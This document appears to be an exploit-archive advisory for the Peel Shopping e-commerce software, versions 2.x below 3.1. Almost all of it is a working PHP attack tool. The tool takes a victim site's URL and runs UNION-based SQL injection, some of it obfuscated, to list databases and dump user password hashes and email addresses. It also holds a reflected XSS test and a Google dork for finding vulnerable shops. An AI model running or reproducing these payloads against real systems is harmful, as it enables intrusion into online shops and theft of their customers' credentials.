Headline
Peel Shopping 2.x Cross Site Scripting / SQL Injection
Peel Shopping versions 2.x and below 3.1 suffer from cross site scripting and remote SQL injection vulnerabilities. This was already noted discovery in 2012 by Cyber-Crystal but this data provides more details.
# Exploit Title: Peel Shopping "catid=" SQL injection# Google Dork: inurl:/lire/index.php?rubid=# Date: 2024-10-02# Exploit Author: Emiliano Febbi# Vendor Homepage: https://www.peel-shopping.com/# Software Link: https://github.com/advisto/peel-shopping# Version: 2.x < 3.1# Tested on: Windows 10## USAGE: ## ## 1 ####If you want test this query: produit_details.php?id=1000&catid=100 you need db name. #### 2 ####If you want test this single parameter index.php?catid= leave the field with default.#### 3 ####If you want test this parameter index.php?rubid= don't you need db name. (#Expl-3) #### Details: ####You can also test the search module affected by XSS. ####If you see many iframes are the switch of the tables or parameters;carefully use the ## ##characters '/' in the full path and '-' before the numericals vars. ########################################################################################### #########################################################################################*****************************************************************************************[code] Multiple Vulnerabilities exploit [tested]<?phpecho '<html><head><title>Peel Shopping 2.x < 3.1 "catid=" SQL injection</title></head><body><body bgcolor="black"><font color="white"><center><pre>##################################Peel Shopping 2.x < 3.1 Exploit##vuln finder! ##Code by Emiliano Febbi - 2024 ##################################( first get db name and later run exploit )</pre><h2>#Expl-1</h2>1 [#Query interested] -> produit_details.php?id=1000&catid=100 AND index.php?catid=<br><br><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">#Get Database Name:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font><br><input type="text" name="victim_site"><input type="submit" value="Get!"></form><br><font color="yellow">###########################################################</font><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">[#insert victim site]:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font> or<br><font color="lime">(*http://www.site.fr/index.php?catid=-1)</font><- DB_Name default<br><input type="text" name="victim_sitee"><br>[#insert database name]:<br><input type="text" name="victim_db" value="default"><input type="submit" value="LOAD"></form><br><font color="yellow">###########################################################</font><br><h2>#Expl-2</h2><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">#XSS Test[search_module]:<font color="red"><br>(*Format: http://www.site.fr/)</font><br><input type="text" name="site_XSS" value="http://www.site.fr/"><input type="submit" value="test!"></form><br><font color="yellow">###########################################################</font><br></font></body></center></html>';if($_POST['victim_site']) {$site = $_POST['victim_site'];print "<center><font color='red'>#DB_Name:</font>(try-1)<br>";$gettt=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--"); $tags=explode('<td class="petit">',$gettt); $tags=explode("</td>",$tags[1]); $cleaning = array("performance_schema","information_schema", "Accueil", "Vous", "ici", "tes", ); $ok = ""; $filtred = str_replace($cleaning, $ok, $tags[0]); var_dump(strip_tags($filtred)); print "</center><br><br>"; print "<center><font color='red'>#DB_Name:</font>(try-2)<br>";$gettts=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--"); $tagss=explode('information_schema<br>',$gettts); $tagss=explode('" href=',$tagss[1]); $filtreds = str_replace($cleaning, $ok, $tagss[0]); var_dump(strip_tags($filtreds)); };;/*#exploit*/if($_POST['victim_sitee'] and $_POST['victim_db']) {$sitee = $_POST['victim_sitee']; $hack_db = $_POST['victim_db'];?><center><font color='lime'>1- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> id=&catid=<br><iframe src='<? echo "$sitee"; ?>%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(<? echo "$hack_db"; ?>.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--' title='exploit' height='100' width='500'></iframe><br><font color="yellow">###########################################################</font><br><font color='lime'>2- #ALL @E-Mail and Users: ~table -><font color='white'>utilisateurs</font></font>-> id=&catid=<br><iframe src='<? echo "$sitee"; ?>%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(<? echo "$hack_db"; ?>.utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--' title='exploit' height='100' width='500'></iframe><br><font color='lime'>3- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> catid=<br><iframe src='<? echo "$sitee"; ?>+union+all+select+1,mot_passe,3,4+FROM+peel_utilisateurs--' title='exploit' height='100' width='500'></iframe></center><?print "<center><font color='red'>[emails cracked]+md5:</font><br>";$textt=file_get_contents("$sitee+%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM($hack_db.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--");$ress = preg_match_all("/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",$textt,$matchess);if ($ress) {foreach(array_unique($matchess[0]) as $emails) {echo $emails . "<br />";}}else {echo "No emails found.";}};;;/*#exploit*/echo '<center><h2>#Expl-3</h2><br><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">independent -> #try again to hack!:</font><font color="red"><br>(*Format: http://www.site.fr)</font><br><input type="text" name="hack2" value="http://www.site.fr"><br><input type="submit" value="LOAD"></center><br>';if($_POST['hack2']) {$hackk = $_POST['hack2'];echo '<center><br><font color="yellow">###########################################################</font><br>'; echo "2 [#Query interested] -> index.php?rubid=<br><font color='red'>#password1:</font>(try-1)<br>";?><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+peel_utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password2:</font>(try-2)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password3:</font>(try-3)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe+FROM+peel_utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password4:</font>(try-4)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe+FROM+utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><?print "<font color='red'>[emails cracked]:</font><br>";$text=file_get_contents("$hackk/index.php?rubid=-1+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,email,3%20FROM%20peel_utilisateurs--");$res = preg_match_all("/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",$text,$matches);if ($res) {foreach(array_unique($matches[0]) as $email) {echo $email . "<br />";}}else {echo "No emails found.";}};;;;;/*#exploit*/if($_POST['site_XSS']) {$XSS = $_POST['site_XSS'];?><center><iframe src='<? echo "$XSS"; ?>recherche.php?start=0&motclef=<script>alert("XSS vulnerable!")</script>' title='exploit3' height='100' width='500'></iframe></center><br><?};;;;?>[/code]